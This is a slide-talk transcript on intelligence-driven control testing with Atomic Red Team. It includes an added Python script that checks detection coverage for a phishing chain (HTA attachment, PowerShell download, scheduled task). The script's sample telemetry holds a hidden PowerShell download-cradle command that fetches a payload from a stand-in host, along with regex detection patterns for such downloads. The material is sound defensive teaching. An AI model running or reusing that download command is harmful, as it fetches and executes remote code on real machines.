Intelligence Driven Testing with Atomic Red Team

Time is short, resources are spread thin, and you are responsible for ensuring your security investments deliver on their promises. Intelligence-driven testing shows how you can prove your controls work against real-world adversary techniques by consuming information about adversaries and adapting tests from the freely available Atomic Red Team project.

Tony M Lambert

April 13, 2019

Transcript

  1. Tony Lambert, Evil Finder, Red Canary (@ForensicITGuy)
     ▪ Detection & analysis at Red Canary
     ▪ Recovering sysadmin
     ▪ Loves to teach, hates to grade homework
     ▪ $env:UserName

  2. Agenda
     ▪ Where are you in control testing?
     ▪ Problems in testing methodology
     ▪ A better way to test
     ▪ Atomic Red Team overview

  3. Places in Testing
     ▪ Adversary simulation
     ▪ Red teams
     ▪ Penetration testing
     ▪ Blue team maintaining controls

  4. Where Are You?
     ▪ Not everyone can afford simulations
     ▪ Some do compliance only
     ▪ Testing without money to test
     ▪ Do you improve between tests?

  5. A Better Way
     ▪ Baseline current controls
       ◦ Simpler is better
     ▪ Construct a chain of adversary behavior
       ◦ Start with phishing
     ▪ Inspect your controls
     ▪ Improve coverage and configurations

  6. Chain of Behavior: make it real, start simple with phishing
     ▪ HTA email attachment (T1170)
     ▪ PowerShell to download something (T1086)
     ▪ Scheduled task for persistence (T1053)

  7. Inspect Controls: what worked or didn’t?
     ▪ HTA attachment
       ◦ Email, AV, endpoint monitoring
     ▪ PowerShell download
       ◦ Endpoint logging
     ▪ Scheduled task
       ◦ Hunts for persistence
       ◦ Windows Event Logs

  8. Improve
     ▪ Coverage
       ◦ Artifacts or hosts
     ▪ Configuration
       ◦ Did you think you’d catch it?
       ◦ Opportunity to fix things
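Slides 6 to 8 describe one procedure: run a short chain of behavior, check which telemetry source saw each link, and separate coverage gaps (the sensor was there but the rule did not fire) from configuration gaps (the telemetry was never collected). The script below is an added example, not part of the deck or the Atomic Red Team project. It runs three simple detection rules over a handful of constructed process-creation and Security-log records; the field names, the parent-process heuristic and the download-cradle keywords are assumptions chosen for the illustration. The technique IDs are the ones on the slides; current ATT&CK has since folded T1170 into T1218.005 and T1086 into T1059.001.

```python
"""Coverage check for the phishing chain on the slides:
HTA attachment (T1170) -> PowerShell download (T1086) -> scheduled task (T1053).
Added example with constructed telemetry; not code from the deck or from Atomic Red Team.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

# Constructed sample records, shaped loosely like Sysmon event 1 (process create)
# and Windows Security event 4698 (scheduled task created). Field names are assumptions.
SAMPLE_EVENTS: List[dict] = [
    {"source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "command_line": r'mshta.exe "C:\Users\jdoe\AppData\Local\Temp\invoice.hta"'},
    {"source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": "powershell.exe -nop -w hidden -c "
                     "\"(New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\""},
    {"source": "Security", "event_id": 4698,
     "task_name": r"\Updater", "subject_user": "jdoe"},
    {"source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe"},
]


@dataclass(frozen=True)
class Rule:
    technique: str                  # ATT&CK ID as written on the slides
    name: str
    source: str                     # telemetry source the rule depends on
    match: Callable[[dict], bool]   # predicate over one event of that source


def _cmd(event: dict) -> str:
    return event.get("command_line", "").lower()


# Three deliberately simple rules, one per link in the chain.
RULES: List[Rule] = [
    Rule("T1170", "HTA email attachment", "Sysmon",
         lambda e: e["event_id"] == 1
         and e["image"].lower().endswith("mshta.exe")
         and "outlook.exe" in e["parent_image"].lower()),
    Rule("T1086", "PowerShell download cradle", "Sysmon",
         lambda e: e["event_id"] == 1
         and e["image"].lower().endswith("powershell.exe")
         and re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", _cmd(e)) is not None),
    Rule("T1053", "Scheduled task created", "Security",
         lambda e: e["event_id"] == 4698),
]


def check_coverage(events: List[dict], rules: List[Rule] = RULES) -> Dict[str, str]:
    """Map each technique to one of three outcomes:
    'detected'     - a rule fired on the collected telemetry
    'missed'       - the source was collected but no rule fired (coverage gap, slide 8)
    'no_telemetry' - the source was never collected at all (configuration gap, slide 8)
    """
    sources = {e["source"] for e in events}
    outcome: Dict[str, str] = {}
    for rule in rules:
        if rule.source not in sources:
            outcome[rule.technique] = "no_telemetry"
        elif any(rule.match(e) for e in events if e["source"] == rule.source):
            outcome[rule.technique] = "detected"
        else:
            outcome[rule.technique] = "missed"
    return outcome


def report(events: List[dict], rules: List[Rule] = RULES) -> List[str]:
    """One human-readable line per link of the chain."""
    outcome = check_coverage(events, rules)
    return [f"{r.technique} {r.name}: {outcome[r.technique]} (needs {r.source})" for r in rules]


if __name__ == "__main__":
    for line in report(SAMPLE_EVENTS):
        print(line)
    # Same chain, but the Security log was never forwarded: a configuration gap.
    for line in report([e for e in SAMPLE_EVENTS if e["source"] != "Security"]):
        print(line)
```

Running it on the full sample reports all three links as detected; dropping the Security records turns T1053 into `no_telemetry`, which is the "did you think you'd catch it?" case from slide 8, while benign-only Sysmon records leave T1170 and T1086 as `missed`. Swap the constructed records for an export from your own sensor after an Atomic Red Team run and the same three-way split tells you whether to fix the rule or the collection.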
  9. Start With Intelligence
     ▪ Articles with adversary techniques
       ◦ Cybereason, Unit 42, ESET
     ▪ Visit MITRE ATT&CK
     ▪ Pivot to Atomic Red Team

  10. The Fancy Stuff
     ▪ Execution framework
       ◦ There’s a wizard for that!
     ▪ Chain reactions
       ◦ Simulate a specific attack